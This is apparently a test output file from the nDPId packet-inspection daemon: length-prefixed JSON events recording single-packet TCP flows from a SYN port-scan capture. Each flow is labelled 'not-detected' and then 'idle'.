-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 